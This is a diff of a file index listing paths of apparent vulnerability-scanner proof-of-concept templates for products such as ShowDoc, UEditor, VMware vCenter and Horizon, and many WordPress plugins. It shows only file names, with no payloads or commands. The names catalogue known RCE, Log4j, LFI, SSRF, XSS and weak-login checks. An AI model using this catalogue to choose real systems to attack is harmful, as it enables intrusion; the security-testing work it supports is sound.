./poc/upload/showdoc-file-upload-rce-10227.yaml ./poc/upload/showdoc-file-upload-rce-10228.yaml +./poc/upload/showdoc-file-upload-rce-10229.yaml ./poc/upload/showdoc-file-upload-rce.yaml ./poc/upload/showdoc-uploadfile.yaml ./poc/upload/showdoc-uploadfile.yml @@ -94296,7 +94320,6 @@ ./poc/upload/telerik-fileupload-detect-10692.yaml ./poc/upload/telerik-fileupload-detect-10693.yaml ./poc/upload/telerik-fileupload-detect-10694.yaml -./poc/upload/telerik-fileupload-detect-10695.yaml ./poc/upload/telerik-fileupload-detect-10696.yaml ./poc/upload/telerik-fileupload-detect-10697.yaml ./poc/upload/telerik-fileupload-detect.yaml @@ -94319,17 +94342,18 @@ ./poc/upload/tuxedo-big-file-uploads-5cc97f9606694e1c9772302f55149e8a.yaml ./poc/upload/tuxedo-big-file-uploads.yaml ./poc/upload/ueditor-cnvd-2017-20077-file-upload.yml -./poc/upload/ueditor-file-upload-10872.yaml ./poc/upload/ueditor-file-upload-10873.yaml ./poc/upload/ueditor-file-upload-10874.yaml +./poc/upload/ueditor-file-upload-10875.yaml ./poc/upload/ueditor-file-upload-10876.yaml +./poc/upload/ueditor-file-upload.yaml ./poc/upload/ueditor-upload.yaml ./poc/upload/ueditor-uploadVul.yaml ./poc/upload/ueditor_1433_net-upload-catchimage.yaml ./poc/upload/unauthenticated-popup-upload-10919.yaml ./poc/upload/unauthenticated-popup-upload-10920.yaml ./poc/upload/unauthenticated-popup-upload-10921.yaml -./poc/upload/unauthenticated-popup-upload-10923.yaml +./poc/upload/unauthenticated-popup-upload-10922.yaml ./poc/upload/upload-file-type-settings-plugin-34a83d20c52593027e0331b726395a3e.yaml ./poc/upload/upload-file-type-settings-plugin.yaml ./poc/upload/upload-media-by-url-76789b55ff551b3b92d96d845bdeb7a3.yaml @@ -94455,9 +94479,9 @@ ./poc/upload/wp-maximum-upload-file-size.yaml ./poc/upload/wp-s3-smart-upload-0e654c0d9359d018606c7100ba8cabb1.yaml ./poc/upload/wp-s3-smart-upload.yaml +./poc/upload/wp-upload-data-11602.yaml ./poc/upload/wp-upload-data-11603.yaml ./poc/upload/wp-upload-data-11604.yaml -./poc/upload/wp-upload-data-11605.yaml ./poc/upload/wp-upload-restriction-34ada383253b9728876613379fa9dea6.yaml ./poc/upload/wp-upload-restriction-3b5c347348b988baaab2601e987517ae.yaml ./poc/upload/wp-upload-restriction-81b96fa379daa9e93cab1ad57b78f1f7.yaml @@ -94499,9 +94523,7 @@ ./poc/upload/zhiyuan-file-upload-11792.yaml ./poc/upload/zhiyuan-file-upload-11793.yaml ./poc/upload/zhiyuan-file-upload-11794.yaml -./poc/upload/zhiyuan-file-upload-11795.yaml ./poc/upload/zhiyuan-file-upload-11796.yaml -./poc/upload/zhiyuan-file-upload.yaml ./poc/upload/zhiyuan-upload-bypass.yaml ./poc/upload/zx-csv-upload-496aed87f34f05f4c538f1eed3901e58.yaml ./poc/upload/zx-csv-upload.yaml @@ -94525,13 +94547,14 @@ ./poc/vmware/vmware-hcx-login.yaml ./poc/vmware/vmware-horizon-11038.yaml ./poc/vmware/vmware-horizon-11039.yaml -./poc/vmware/vmware-horizon-11040.yaml +./poc/vmware/vmware-horizon-11041.yaml ./poc/vmware/vmware-horizon-daas.yaml -./poc/vmware/vmware-horizon-log4j-jndi-rce-11033.yaml ./poc/vmware/vmware-horizon-log4j-jndi-rce-11034.yaml +./poc/vmware/vmware-horizon-log4j-jndi-rce.yaml ./poc/vmware/vmware-horizon-log4j-rce.yaml ./poc/vmware/vmware-horizon-panel-11035.yaml ./poc/vmware/vmware-horizon-panel-11036.yaml +./poc/vmware/vmware-horizon-panel-11037.yaml ./poc/vmware/vmware-horizon-panel.yaml ./poc/vmware/vmware-horizon.yaml ./poc/vmware/vmware-nsx-login.yaml @@ -94545,28 +94568,30 @@ ./poc/vmware/vmware-vcenter-lfi-11047.yaml ./poc/vmware/vmware-vcenter-lfi-2.yaml ./poc/vmware/vmware-vcenter-lfi-3.yaml -./poc/vmware/vmware-vcenter-lfi-linux-11042.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11043.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11044.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11045.yaml -./poc/vmware/vmware-vcenter-lfi.yaml ./poc/vmware/vmware-vcenter-log4j-jndi-rce-11050.yaml +./poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml ./poc/vmware/vmware-vcenter-ssrf-11051.yaml ./poc/vmware/vmware-vcenter-ssrf-11052.yaml +./poc/vmware/vmware-vcenter-ssrf-11053.yaml +./poc/vmware/vmware-vcenter-ssrf.yaml ./poc/vmware/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml ./poc/vmware/vmware-vcenter.yaml ./poc/vmware/vmware-vcloud-director.yaml -./poc/vmware/vmware-version-detect-11054.yaml ./poc/vmware/vmware-version-detect-11055.yaml ./poc/vmware/vmware-version-detect.yaml ./poc/vmware/vmware-virtualcenter.yaml ./poc/vmware/vmware-vrealize-cve-2021-21975-ssrf.yml ./poc/vmware/vmware-vrealize-detect-11056.yaml -./poc/vmware/vmware-vrealize-detect-11057.yaml +./poc/vmware/vmware-vrealize-detect-11058.yaml +./poc/vmware/vmware-vrealize-detect.yaml ./poc/vmware/vmware-vrealize-operations-manager.yaml ./poc/vmware/vmware-vrealize.yaml ./poc/vmware/vmware-vsphere.yaml -./poc/vmware/vmware-workflow-11059.yaml +./poc/vmware/vmware-workflow-11060.yaml +./poc/vmware/vmware-workflow.yaml ./poc/vmware/vmware-workspace-one-log4j-rce.yaml ./poc/vmware/vmwareview.yaml ./poc/web/360-webscan.yaml @@ -94599,8 +94624,7 @@ ./poc/web/Wordpress-NMedia_Website_Contact_Form-FileInclude.yaml ./poc/web/a2b-webserver.yaml ./poc/web/abyss-web-server-11.yaml -./poc/web/abyss-web-server-12.yaml -./poc/web/abyss-web-server.yaml +./poc/web/abyss-web-server-13.yaml ./poc/web/acceso-web-portal.yaml ./poc/web/achecker-web-accessibility-evaluation-tool.yaml ./poc/web/activeweb-content-server.yaml @@ -94621,6 +94645,7 @@ ./poc/web/allwebmenus-wordpress-menu-plugin-6fccf9724ad0c3a7999ba4458a09dec3.yaml ./poc/web/allwebmenus-wordpress-menu-plugin-a99cc6da4cf5abaf11a1d7b1038cbfb5.yaml ./poc/web/allwebmenus-wordpress-menu-plugin.yaml +./poc/web/alphaweb-default-login-275.yaml ./poc/web/alphaweb-default-login-276.yaml ./poc/web/alphaweb-default-login-277.yaml ./poc/web/am-websystem.yaml @@ -94630,6 +94655,7 @@ ./poc/web/appsmith-web-login.yaml ./poc/web/arangodb-web-Interface.yaml ./poc/web/archibus-webcentral-panel.yaml +./poc/web/artica-web-proxy-detect-543.yaml ./poc/web/artica-web-proxy-detect-544.yaml ./poc/web/artica-web-proxy-detect-545.yaml ./poc/web/artica-web-proxy-detect-546.yaml @@ -94643,14 +94669,16 @@ ./poc/web/axigen-webadmin-659.yaml ./poc/web/axigen-webadmin-660.yaml ./poc/web/axigen-webmail-662.yaml +./poc/web/axigen-webmail-663.yaml ./poc/web/axigen-webmail-664.yaml ./poc/web/axis2-web.yaml ./poc/web/axway-securetransport-webclient.yaml +./poc/web/azkaban-web-client-676.yaml ./poc/web/azkaban-web-client-677.yaml ./poc/web/azkaban-web-client-678.yaml -./poc/web/azkaban-web-client-679.yaml ./poc/web/azkaban-web-client-680.yaml ./poc/web/azkaban-web-client-default-creds.yaml +./poc/web/azkaban-web-client.yaml ./poc/web/azure-website-enum.yaml ./poc/web/bizcalendar-web-bbb880210d42a6df93041f7b5a68a42e.yaml ./poc/web/bizcalendar-web.yaml @@ -94706,7 +94734,6 @@ ./poc/web/dixell-xweb500-filewrite-7018.yaml ./poc/web/dixell-xweb500-filewrite-7019.yaml ./poc/web/dixell-xweb500-filewrite-7020.yaml -./poc/web/dixell-xweb500-filewrite.yaml ./poc/web/dom-xss-web-message.yaml ./poc/web/drupal_module-webform-access-bypass.yaml ./poc/web/drupal_module-webform-cross-site-scripting.yaml @@ -94751,9 +94778,9 @@ ./poc/web/evse-web-panel.yaml ./poc/web/ewebeditor.yaml ./poc/web/ewebs-arbitrary-file-reading-7270.yaml +./poc/web/ewebs-arbitrary-file-reading-7271.yaml ./poc/web/ewebs-arbitrary-file-reading-7272.yaml ./poc/web/ewebs-arbitrary-file-reading-7273.yaml -./poc/web/ewebs-arbitrary-file-reading.yaml ./poc/web/ewebs-lfi.yaml ./poc/web/ewebs.yaml ./poc/web/exposed-webalizer-7358.yaml @@ -94792,8 +94819,8 @@ ./poc/web/formassembly-web-forms-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/formassembly-web-forms-plugin.yaml ./poc/web/formassembly-web-forms.yaml -./poc/web/fortiweb-panel-7537.yaml ./poc/web/fortiweb-panel-7538.yaml +./poc/web/fortiweb-panel-7539.yaml ./poc/web/fortiweb-panel.yaml ./poc/web/g-web-shop-238f655f125fd9eb47ac850e4dd0308d.yaml ./poc/web/g-web-shop-8bcbd9df7ad066b369f27b7e164ccd0c.yaml @@ -94813,7 +94840,6 @@ ./poc/web/geovision-geowebserver-xss-7599.yaml ./poc/web/geovision-geowebserver-xss-7600.yaml ./poc/web/geovision-geowebserver-xss-7601.yaml -./poc/web/geovision-geowebserver-xss.yaml ./poc/web/geowebcache.yaml ./poc/web/geowebserver-detector.yaml ./poc/web/geowebserver-workflow.yaml @@ -94875,14 +94901,14 @@ ./poc/web/ibm-websphere-ssrf.yaml ./poc/web/ibm-websphere.yaml ./poc/web/icewarp-webclient-basic-rce.yaml +./poc/web/icewarp-webclient-rce-8129.yaml ./poc/web/icewarp-webclient-rce-8130.yaml ./poc/web/icewarp-webclient-rce-8131.yaml ./poc/web/icewarp-webclient-rce-8132.yaml ./poc/web/icewarp-webclient-rce-8133.yaml -./poc/web/icewarp-webclient-rce.yaml ./poc/web/icinga-web-login-8134.yaml ./poc/web/icinga-web-login-8135.yaml -./poc/web/icinga-web-login-8136.yaml +./poc/web/icinga-web-login-8137.yaml ./poc/web/icinga-web-login.yaml ./poc/web/ideawebserver.yaml ./poc/web/igenus-webmail.yaml @@ -94900,6 +94926,7 @@ ./poc/web/ip-guard-webserver-rce.yaml ./poc/web/iplanet-web-server-8189.yaml ./poc/web/iplanet-web-server-8190.yaml +./poc/web/iplanet-web-server-8191.yaml ./poc/web/iwebshop.yaml ./poc/web/iwebsns.yaml ./poc/web/ixbusweb-version.yaml @@ -94936,14 +94963,13 @@ ./poc/web/metaswitch-networks-metaview-web.yaml ./poc/web/mfiles-web-detect.yaml ./poc/web/microsoft-remote-web-workplace.yaml -./poc/web/microsoft-teams-webhook-8856.yaml ./poc/web/microsoft-teams-webhook-8857.yaml -./poc/web/microweber-detect-8862.yaml +./poc/web/microsoft-teams-webhook-8858.yaml +./poc/web/microsoft-teams-webhook.yaml ./poc/web/microweber-detect-8863.yaml ./poc/web/microweber-stored-xss.yaml ./poc/web/microweber-xss-8864.yaml ./poc/web/microweber-xss-8865.yaml -./poc/web/microweber-xss.yaml ./poc/web/mingyuanyun-erp-visitorweb-xmlhttp-aspx-sqli.yaml ./poc/web/mongo-express-web-gui.yaml ./poc/web/ms-exchange-web-service.yaml @@ -94957,12 +94983,11 @@ ./poc/web/mywebcounter.yaml ./poc/web/mywebftp.yaml ./poc/web/mywebsql.yaml -./poc/web/netsurveillance-web-9057.yaml +./poc/web/netsurveillance-web.yaml ./poc/web/netsweeper-webadmin-detect-1.yaml ./poc/web/netsweeper-webadmin-detect-2.yaml ./poc/web/netsweeper-webadmin-detect-9066.yaml ./poc/web/netsweeper-webadmin-detect-9067.yaml -./poc/web/netsweeper-webadmin-detect-9068.yaml ./poc/web/netsweeper-webadmin-detect.yaml ./poc/web/nettalk-webserver.yaml ./poc/web/netzone-webcache.yaml @@ -94996,6 +95021,8 @@ ./poc/web/opt-webfieldassis.yaml ./poc/web/oracle-iplanet-web-server-9391.yaml ./poc/web/oracle-iplanet-web-server-9392.yaml +./poc/web/oracle-iplanet-web-server-9393.yaml +./poc/web/oracle-iplanet-web-server.yaml ./poc/web/oracle-webdb.yaml ./poc/web/oracle-weblogic.yaml ./poc/web/original-texts-yandex-webmaster-2e0593c9307af66de377149e0e6a4d6c.yaml @@ -95047,7 +95074,6 @@ ./poc/web/samphpweb.yaml ./poc/web/sap-netweaver-webgui-10056.yaml ./poc/web/sap-netweaver-webgui-10057.yaml -./poc/web/sap-netweaver-webgui-10058.yaml ./poc/web/sap-netweaver-webgui-10059.yaml ./poc/web/sap-nw-abap-webgui.yaml ./poc/web/sap-web-application-server.yaml @@ -95055,7 +95081,9 @@ ./poc/web/sap-web-dispatcher-10075.yaml ./poc/web/sap-web-dispatcher-10076.yaml ./poc/web/sap-web-dispatcher-10077.yaml +./poc/web/sap-web-dispatcher-10078.yaml ./poc/web/sap-web-dispatcher-admin-portal-10069.yaml +./poc/web/sap-web-dispatcher-admin-portal-10070.yaml ./poc/web/sap-web-dispatcher-admin-portal-10071.yaml ./poc/web/sap-web-dispatcher-admin-portal-10072.yaml ./poc/web/sap-web-dispatcher-admin-portal-10073.yaml @@ -95267,10 +95295,11 @@ ./poc/web/webcam-2way-videochat-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/webcam-2way-videochat-plugin.yaml ./poc/web/webcam-2way-videochat.yaml -./poc/web/webcamxp-5-11122.yaml +./poc/web/webcamxp-5.yaml ./poc/web/webcomco-panel.yaml ./poc/web/webeditors-1.yaml ./poc/web/webeditors-11128.yaml +./poc/web/webeditors-11129.yaml ./poc/web/webeditors-11130.yaml ./poc/web/webeditors-2.yaml ./poc/web/webeditors-3.yaml @@ -95292,9 +95321,9 @@ ./poc/web/weberino-timed-quiz-creator.yaml ./poc/web/webflow-pages-1ea2b2d3f70cdc2bbd228fad03d8cc84.yaml ./poc/web/webflow-pages.yaml -./poc/web/webflow-takeover-11131.yaml ./poc/web/webflow-takeover-11132.yaml ./poc/web/webflow-takeover-11133.yaml +./poc/web/webflow-takeover-11134.yaml ./poc/web/webflow-takeover.yaml ./poc/web/webfolio-31eb77eaefc61e112478e9f1952e822d.yaml ./poc/web/webfolio-9099a88f255af571eb05254581f8054d.yaml @@ -95363,7 +95392,6 @@ ./poc/web/weblogic-weak-login-11154.yaml ./poc/web/weblogic-weak-login-11155.yaml ./poc/web/weblogic-weak-login-11156.yaml -./poc/web/weblogic-weak-login.yaml ./poc/web/weblogic-workflow-11157.yaml ./poc/web/weblogic-workflow.yaml ./poc/web/webmail-basic.yaml @@ -95383,7 +95411,7 @@ ./poc/web/webmin-config-exposure.yml ./poc/web/webmin-cve-2019-15107-rce.yml ./poc/web/webmin-panel-1.yaml -./poc/web/webmin-panel-11159.yaml +./poc/web/webmin-panel-11158.yaml ./poc/web/webmin-panel-2.yaml ./poc/web/webmin-panel.yaml ./poc/web/webmin-workflow.yaml @@ -95392,7 +95420,6 @@ ./poc/web/webmodule-ee-11163.yaml ./poc/web/webmodule-ee-11164.yaml ./poc/web/webmodule-ee-panel-11160.yaml -./poc/web/webmodule-ee-panel-11161.yaml ./poc/web/webmodule-ee-panel.yaml ./poc/web/webmodule-ee.yaml ./poc/web/webp-converter-for-media-a33c88596c6b666a69762f624cf7c81b.yaml @@ -95447,7 +95474,6 @@ ./poc/web/webtransfer-client-panel.yaml ./poc/web/webtrees-install.yaml ./poc/web/webtrust-cert.yaml -./poc/web/webui-rce-11170.yaml ./poc/web/webui-rce-11171.yaml ./poc/web/webui-rce-11172.yaml ./poc/web/webui-rce-11173.yaml @@ -95464,7 +95490,7 @@ ./poc/web/webview-load-url-11182.yaml ./poc/web/webview-load-url.yaml ./poc/web/webview-universal-access-11183.yaml -./poc/web/webview-universal-access-11185.yaml +./poc/web/webview-universal-access-11184.yaml ./poc/web/webview-universal-access.yaml ./poc/web/webwinkelkeur-ced2503806e6d345fdbe860b7d0f8b57.yaml ./poc/web/webwinkelkeur-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -95491,8 +95517,9 @@ ./poc/web/xerox-phaser-7500dt-webserver.yaml ./poc/web/xidite-wifi-web-cookie-bypass.yaml ./poc/web/xp-webcam-11696.yaml -./poc/web/xp-webcam-11697.yaml +./poc/web/xp-webcam-11698.yaml ./poc/web/xp-webcam-11699.yaml +./poc/web/xp-webcam.yaml ./poc/web/xweb500-panel.yaml ./poc/web/yonyou-nc-ncfindweb-directory-traversal.yaml ./poc/web/yonyou-u9-umwebservice-fileread.yaml @@ -96115,6 +96142,7 @@ ./poc/wordpress/easy-wp-smtp-listing-7154.yaml ./poc/wordpress/easy-wp-smtp-listing-7155.yaml ./poc/wordpress/easy-wp-smtp-listing-7156.yaml +./poc/wordpress/easy-wp-smtp-listing-7157.yaml ./poc/wordpress/easy-wp-smtp-listing.yaml ./poc/wordpress/easy-wp-smtp.yaml ./poc/wordpress/easyrotator-for-wordpress-0184078b79ad95363b9f16489d7e6821.yaml @@ -96182,7 +96210,6 @@ ./poc/wordpress/feedwordpress-db142dc7dc2479e241016bfec90b9659.yaml ./poc/wordpress/feedwordpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/feedwordpress-plugin.yaml -./poc/wordpress/feedwordpress-xss-7459.yaml ./poc/wordpress/feedwordpress-xss-7460.yaml ./poc/wordpress/feedwordpress-xss.yaml ./poc/wordpress/feedwordpress.yaml @@ -96789,10 +96816,8 @@ ./poc/wordpress/n-media-wp-simple-quiz.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9000.yaml -./poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9003.yaml -./poc/wordpress/nativechurch-wp-theme-lfd-9004.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-0edf774a73681701d15ccd27145d0f02.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-114bbf244df9c7fd1e8612fd62abeff4.yaml @@ -97142,7 +97167,6 @@ ./poc/wordpress/trilithic-viewpoint-login-10838.yaml ./poc/wordpress/trilithic-viewpoint-login-10839.yaml ./poc/wordpress/trilithic-viewpoint-login-10840.yaml -./poc/wordpress/trilithic-viewpoint-login.yaml ./poc/wordpress/twentyfourth-wp-scraper-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/twentyfourth-wp-scraper-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/wordpress/twentyfourth-wp-scraper.yaml @@ -97179,8 +97203,8 @@ ./poc/wordpress/verweise-wordpress-twitter.yaml ./poc/wordpress/videojs-html5-video-player-for-wordpress-4eb103ae150e63f14ea0465bbdd222cb.yaml ./poc/wordpress/videojs-html5-video-player-for-wordpress.yaml +./poc/wordpress/viewpoint-system-status-11016.yaml ./poc/wordpress/viewpoint-system-status-11017.yaml -./poc/wordpress/viewpoint-system-status-11018.yaml ./poc/wordpress/viewpoint-system-status-11019.yaml ./poc/wordpress/viewpoint-system-status.yaml ./poc/wordpress/views-for-wpforms-lite-3242a9557ef1bd82e6212d9b01c1527e.yaml @@ -97460,6 +97484,7 @@ ./poc/wordpress/wordpress-accessible-wpconfig-1.yaml ./poc/wordpress/wordpress-accessible-wpconfig-10.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11.yaml +./poc/wordpress/wordpress-accessible-wpconfig-11234.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11235.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11237.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11238.yaml @@ -97491,9 +97516,9 @@ ./poc/wordpress/wordpress-ae44f6a1ec4312db054e74e48af20717.yaml ./poc/wordpress/wordpress-af2937e1967165caa42cd4ad64300421.yaml ./poc/wordpress/wordpress-afad16faf36b64e536b10247898859bf.yaml -./poc/wordpress/wordpress-affiliatewp-log-11240.yaml ./poc/wordpress/wordpress-affiliatewp-log-11241.yaml ./poc/wordpress/wordpress-affiliatewp-log-11242.yaml +./poc/wordpress/wordpress-affiliatewp-log-11243.yaml ./poc/wordpress/wordpress-affiliatewp-log-11244.yaml ./poc/wordpress/wordpress-affiliatewp-log.yaml ./poc/wordpress/wordpress-arbitrary-file-download.yaml @@ -97526,7 +97551,7 @@ ./poc/wordpress/wordpress-bbe7d5752179155e1a73c493a9edc901.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11246.yaml -./poc/wordpress/wordpress-bbpress-plugin-listing.yaml +./poc/wordpress/wordpress-bbpress-plugin-listing-11247.yaml ./poc/wordpress/wordpress-bc11188030c5ef34e44564c173b85b3b.yaml ./poc/wordpress/wordpress-bcae5ef6c0a4aa3c431c36626afbf967.yaml ./poc/wordpress/wordpress-bcee80614ad35036078b4b38fac65ba7.yaml @@ -97613,6 +97638,7 @@ ./poc/wordpress/wordpress-db-repair-11252.yaml ./poc/wordpress/wordpress-db-repair-11253.yaml ./poc/wordpress/wordpress-db-repair-11255.yaml +./poc/wordpress/wordpress-db-repair.yaml ./poc/wordpress/wordpress-db3daefc79ef0c3afc5d2a722651f6df.yaml ./poc/wordpress/wordpress-dc0f502ac4588bfe8cd3ddc00f203d36.yaml ./poc/wordpress/wordpress-dc982dd7df3ed81318a182bbadd876da.yaml @@ -97621,7 +97647,7 @@ ./poc/wordpress/wordpress-de03b87f4ceb36bcd460178f68d510a8.yaml ./poc/wordpress/wordpress-debug-log-11256.yaml ./poc/wordpress/wordpress-debug-log-11257.yaml -./poc/wordpress/wordpress-debug-log-11258.yaml +./poc/wordpress/wordpress-debug-log-11259.yaml ./poc/wordpress/wordpress-debug-log.yaml ./poc/wordpress/wordpress-detect-11261.yaml ./poc/wordpress/wordpress-detect.yaml @@ -97630,7 +97656,6 @@ ./poc/wordpress/wordpress-directory-listing-11262.yaml ./poc/wordpress/wordpress-directory-listing-11263.yaml ./poc/wordpress/wordpress-directory-listing-11264.yaml -./poc/wordpress/wordpress-directory-listing-11265.yaml ./poc/wordpress/wordpress-directory-listing-11266.yaml ./poc/wordpress/wordpress-directory-listing-2.yaml ./poc/wordpress/wordpress-directory-listing-3.yaml @@ -97671,8 +97696,10 @@ ./poc/wordpress/wordpress-ef96ecb2cd1265aea759b558ece60c76.yaml ./poc/wordpress/wordpress-elementor-plugin-listing-11267.yaml ./poc/wordpress/wordpress-elementor-plugin-listing-11268.yaml +./poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-1.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-11270.yaml +./poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-2.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml ./poc/wordpress/wordpress-emergency-script-11272.yaml @@ -97749,6 +97776,7 @@ ./poc/wordpress/wordpress-gotmls-detect.yaml ./poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml ./poc/wordpress/wordpress-gtranslate-plugin-listing-11283.yaml +./poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml ./poc/wordpress/wordpress-https-4a61ef799fd66b2a49253a5892d07d5e.yaml ./poc/wordpress/wordpress-https-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wordpress-https-fc212cc7eec653319494b488cc7fe53d.yaml @@ -97762,12 +97790,14 @@ ./poc/wordpress/wordpress-infinitewp-auth-bypass-11289.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass.yaml ./poc/wordpress/wordpress-instagram-feed-c6f7df5b11c5d64e4d637b8f3456595f.yaml +./poc/wordpress/wordpress-instagram-feed.yaml ./poc/wordpress/wordpress-install.yaml ./poc/wordpress/wordpress-installer-log-11290.yaml ./poc/wordpress/wordpress-installer-log-11291.yaml ./poc/wordpress/wordpress-installer-log.yaml ./poc/wordpress/wordpress-language-7a04dfac5ff879ee9a27e2783540d3cb.yaml ./poc/wordpress/wordpress-language.yaml +./poc/wordpress/wordpress-lfi(1).yaml ./poc/wordpress/wordpress-lfi.yaml ./poc/wordpress/wordpress-login-11293.yaml ./poc/wordpress/wordpress-login-11294.yaml @@ -97825,14 +97855,14 @@ ./poc/wordpress/wordpress-rce-simplefilelist-11299.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11300.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11301.yaml +./poc/wordpress/wordpress-rce-simplefilelist-11302.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11303.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11304.yaml ./poc/wordpress/wordpress-rce-simplefilelist.yaml ./poc/wordpress/wordpress-rdf-user-enum-11305.yaml ./poc/wordpress/wordpress-rdf-user-enum.yaml -./poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml ./poc/wordpress/wordpress-redirection-plugin-listing-11307.yaml -./poc/wordpress/wordpress-redirection-plugin-listing.yaml +./poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml ./poc/wordpress/wordpress-registration-enabled.yaml ./poc/wordpress/wordpress-rest-api.yaml ./poc/wordpress/wordpress-sensitive-config.yaml @@ -97942,6 +97972,7 @@ ./poc/wordpress/wordpress-users-9cb1611f6e40c8e16f4af99a9bc891b2.yaml ./poc/wordpress/wordpress-users.yaml ./poc/wordpress/wordpress-weak-credentials-11334.yaml +./poc/wordpress/wordpress-weak-credentials-11335.yaml ./poc/wordpress/wordpress-weak-credentials-11336.yaml ./poc/wordpress/wordpress-weak-credentials-11337.yaml ./poc/wordpress/wordpress-weak-credentials.yaml @@ -97952,6 +97983,7 @@ ./poc/wordpress/wordpress-woocommerce-listing-11338.yaml ./poc/wordpress/wordpress-woocommerce-listing-11339.yaml ./poc/wordpress/wordpress-woocommerce-listing-11340.yaml +./poc/wordpress/wordpress-woocommerce-listing-11341.yaml ./poc/wordpress/wordpress-woocommerce-sqli-1.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11342.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11344.yaml @@ -97964,7 +97996,6 @@ ./poc/wordpress/wordpress-wordfence-lfi-11348.yaml ./poc/wordpress/wordpress-wordfence-lfi-11349.yaml ./poc/wordpress/wordpress-wordfence-lfi-11350.yaml -./poc/wordpress/wordpress-wordfence-lfi-11351.yaml ./poc/wordpress/wordpress-wordfence-lfi-11352.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml @@ -97977,13 +98008,14 @@ ./poc/wordpress/wordpress-wordfence-xss-11361.yaml ./poc/wordpress/wordpress-wordfence-xss-11362.yaml ./poc/wordpress/wordpress-wordfence-xss.yaml +./poc/wordpress/wordpress-workflow (copy 1).yaml ./poc/wordpress/wordpress-workflow-11363.yaml ./poc/wordpress/wordpress-workflow-11364.yaml -./poc/wordpress/wordpress-workflow-11366.yaml +./poc/wordpress/wordpress-workflow-11365.yaml ./poc/wordpress/wordpress-wp-config-exposure.yml ./poc/wordpress/wordpress-wpconfig-inclosure.yaml -./poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11368.yaml +./poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11370.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure.yaml @@ -98178,15 +98210,16 @@ ./poc/wordpress/wp-all-import-pro.yaml ./poc/wordpress/wp-all-import.yaml ./poc/wordpress/wp-altair-listing-1.yaml -./poc/wordpress/wp-altair-listing-11406.yaml +./poc/wordpress/wp-altair-listing-11405.yaml ./poc/wordpress/wp-altair-listing-2.yaml ./poc/wordpress/wp-altair-listing-3.yaml ./poc/wordpress/wp-altair-listing-4.yaml +./poc/wordpress/wp-altair-listing.yaml ./poc/wordpress/wp-amasin-the-amazon-affiliate-shop-6ca90c027d7fd5775cb5f2e1ea477c3c.yaml ./poc/wordpress/wp-amasin-the-amazon-affiliate-shop.yaml ./poc/wordpress/wp-amazon-shop-90e615477738db895ced16515c910b83.yaml ./poc/wordpress/wp-amazon-shop.yaml -./poc/wordpress/wp-ambience-xss-11407.yaml +./poc/wordpress/wp-ambience-xss-11408.yaml ./poc/wordpress/wp-ambience-xss-11409.yaml ./poc/wordpress/wp-ambience-xss-11410.yaml ./poc/wordpress/wp-ambience-xss.yaml @@ -98212,7 +98245,7 @@ ./poc/wordpress/wp-anything-slider.yaml ./poc/wordpress/wp-aparat-ddb7d71f9b382077a0d3c539950fa9e4.yaml ./poc/wordpress/wp-aparat.yaml -./poc/wordpress/wp-app-log-11411.yaml +./poc/wordpress/wp-app-log-11412.yaml ./poc/wordpress/wp-app-log-11413.yaml ./poc/wordpress/wp-app-log-11414.yaml ./poc/wordpress/wp-app-log.yaml @@ -98234,9 +98267,9 @@ ./poc/wordpress/wp-appointment-schedule-booking-system.yaml ./poc/wordpress/wp-appointments-schedules-18c89d6aa69e1599fc784ae097e34287.yaml ./poc/wordpress/wp-appointments-schedules.yaml -./poc/wordpress/wp-arforms-listing-11415.yaml ./poc/wordpress/wp-arforms-listing-11416.yaml ./poc/wordpress/wp-arforms-listing-11417.yaml +./poc/wordpress/wp-arforms-listing-11418.yaml ./poc/wordpress/wp-arforms-listing.yaml ./poc/wordpress/wp-aspose-cloud-ebook-plugin-file-download.yaml 